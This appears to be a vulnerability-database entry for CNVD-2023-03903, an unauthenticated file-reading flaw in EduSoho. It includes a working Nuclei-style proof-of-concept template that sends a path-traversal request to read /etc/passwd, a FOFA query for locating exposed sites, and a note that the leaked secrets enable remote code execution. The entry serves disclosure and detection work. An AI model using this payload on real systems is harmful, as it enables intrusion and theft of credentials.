CNVD-2023-03903: EduSoho < v22.4.7 - Local File Inclusion

日期: 2025-08-01 | 影响软件: EduSoho | POC: 已公开

漏洞描述

The edusoho education and training system <v22.4.7 has unauthorized file reading vulnerability. Through this vulnerability, an attacker can read the contents of the config/parameters.yml file and obtain sensitive information such as the secret value saved in the file and database account password. After the secret value is obtained, an attacker can implement RCE with symfony _fragment routing.

PoC代码[已公开]

id: CNVD-2023-03903

info:
  name: EduSoho < v22.4.7 - Local File Inclusion
  author: s4e-io
  severity: high
  description: |
    The edusoho education and training system <v22.4.7 has unauthorized file reading vulnerability. Through this vulnerability, an attacker can read the contents of the config/parameters.yml file and obtain sensitive information such as the secret value saved in the file and database account password. After the secret value is obtained, an attacker can implement RCE with symfony _fragment routing.
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/135007351
    - https://github.com/gobysec/GobyVuls/blob/master/CNVD-2023-03903.md
  metadata:
    verified: true
    max-request: 1
    vendor: hagzhou-kuozhi-network-technology
    product: edusoho
    fofa-query: title="Powered By EduSoho" || body="Powered by <a href=\"http://www.edusoho.com/\" target=\"_blank\">EduSoho" || (body="Powered By EduSoho" && body="var app")
  tags: cnvd,cnvd2023,lfi,edushoho

http:
  - raw:
      - |
        GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: content_type
        words:
          - "text/csv"

      - type: status
        status:
          - 200
# digest: 490a004630440220519e651840157dd0d430613488d05a9fb0ffcbc63470adb56870318817232caf0220601b4c2fb5c9c93574490265cee0c57a5221507738501519d549a21e0f801ed8:922c64590222798bb761d5b6d8e72950

相关漏洞推荐